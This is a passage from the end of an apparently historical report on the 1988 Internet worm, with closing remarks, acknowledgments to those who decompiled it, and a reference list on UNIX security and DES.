features.  Even the _ B_ l_ o_ o_ m _ C_ o_ u_ n_ t_ y comic strip poked fun at it.

Our community has never before been in the limelight in this
way, and judging by the response, it has scared us.  I won't
offer any fancy platitudes about how the experience is going to
change us, but I will say that I think these issues have been
ignored for much longer than was safe, and I feel that a better
understanding of the crisis just past will help us cope better
with the next one.  Let's hope we're as lucky next time as we
were this time.

_ A_ c_ k_ n_ o_ w_ l_ e_ d_ g_ m_ e_ n_ t_ s

No one is to blame for the inaccuracies herein except me,
but there are plenty of people to thank for helping to decompile
the worm and for helping to document the epidemic.  Dave Pare and
Chris Torek were at the center of the action during the late
night session at Berkeley, and they had help and kibitzing from
Keith Bostic, Phil Lapsley, Peter Yee, Jay Lepreau and a cast of
thousands.  Glenn Adams and Dave Siegel provided good information
on the MIT AI Lab attack, while Steve Miller gave me details on
Maryland, Jeff Forys on Utah, and Phil Lapsley, Peter Yee and
Keith Bostic on Berkeley.  Bill Cheswick sent me a couple of fun
anecdotes from AT&T Bell Labs.  Jim Haynes gave me the run-down
on the security problems turned up by his busy little undergrads
at UC Santa Cruz.  Eric Allman, Keith Bostic, Bill Cheswick, Mike
Hibler, Jay Lepreau, Chris Torek and Mike Zeleznik provided many
useful review comments.  Thank you all, and everyone else I for-
got to mention.

Matt Bishop's paper ``A Fast Version of the DES and a Pass-
word Encryption Algorithm'', (c) 1987 by Matt Bishop and the Univer-
sities Space Research Association, was helpful in (slightly)
parting the mysteries of DES for me.  Anyone wishing to under-
stand the worm's DES hacking had better look here first.  The
paper is available with Bishop's _ d_ e_ s_ z_ i_ p distribution of software
for fast DES encryption.  The latter was produced while Bishop
was with the Research Institute for Advanced Computer Science at
NASA Ames Research Center; Bishop is now at Dartmouth College
(_ b_ i_ s_ h_ o_ p@_ b_ e_ a_ r._ d_ a_ r_ t_ m_ o_ u_ t_ h._ e_ d_ u).  He sent me a very helpful note on
the worm's implementation of _ c_ r_ y_ p_ t() which I leaned on heavily
when discussing the algorithm above.

The following documents were also referenced above for
quotes or for other material:

_ D_ a_ t_ a _ E_ n_ c_ r_ y_ p_ t_ i_ o_ n _ S_ t_ a_ n_ d_ a_ r_ d, FIPS PUB 46, National Bureau of Stan-
dards, Washington D.C., January 15, 1977.

F. T. Grampp and R. H. Morris, ``UNIX Operating System Secu-
rity,'' in the _ A_ T&_ T _ B_ e_ l_ l _ L_ a_ b_ o_ r_ a_ t_ o_ r_ i_ e_ s _ T_ e_ c_ h_ n_ i_ c_ a_ l _ J_ o_ u_ r_ n_ a_ l, October
1984, Vol. 63, No. 8, Part 2, p. 1649.

Brian W. Kernighan and Dennis Ritchie, _ T_ h_ e _ C _ P_ r_ o_ g_ r_ a_ m_ m_ i_ n_ g
_ L_ a_ n_ g_ u_ a_ g_ e, Second Edition, Prentice Hall: Englewood Cliffs, NJ,
(c) 1988.

John Markoff, ``Author of computer `virus' is son of U.S. Elec-
tronic Security Expert,'' p. 1 of the _ N_ e_ w _ Y_ o_ r_ k _ T_ i_ m_ e_ s, November 5,
1988.

John Markoff, ``A family's passion for computers, gone sour,'' p.
1 of the _ N_ e_ w _ Y_ o_ r_ k _ T_ i_ m_ e_ s, November 11, 1988.

Robert Morris and Ken Thompson, ``Password Security: A Case His-
tory,'' dated April 3, 1978, in the _ U_ N_ I_ X _ P_ r_ o_ g_ r_ a_ m_ m_ e_ r'_ s _ M_ a_ n_ u_ a_ l, in
the _ S_ u_ p_ p_ l_ e_ m_ e_ n_ t_ a_ r_ y _ D_ o_ c_ u_ m_ e_ n_ t_ s or the _ S_ y_ s_ t_ e_ m _ M_ a_ n_ a_ g_ e_ r'_ s _ M_ a_ n_ u_ a_ l,
depending on where and when you got your manuals.

Robert T. Morris, ``A Weakness in the 4.2BSD Unix TCP/IP
Software,'' AT&T Bell Laboratories Computing Science Technical
Report #117, February 25, 1985.  This paper actually describes a
way of spoofing TCP/IP so that an untrusted host can make use of
the _ r_ s_ h server on any 4.2 BSD UNIX system, rather than an attack
based on breaking into accounts on trusted hosts, which is what
the worm uses.

Brian Reid, ``Massive UNIX breakins at Stanford,'' RISKS-FORUM
Digest, Vol. 3, Issue 56, September 16, 1986.

Dennis Ritchie, ``On the Security of UNIX,'' dated June 10, 1977,
in the same manual you found the Morris and Thompson paper in.

Ken Thompson, ``Reflections on Trusting Trust,'' 1983 ACM Turing
Award Lecture, in the _ C_ o_ m_ m_ u_ n_ i_ c_ a_ t_ i_ o_ n_ s _ o_ f _ t_ h_ e _ A_ C_ M, Vol. 27, No. 8,
p. 761, August 1984.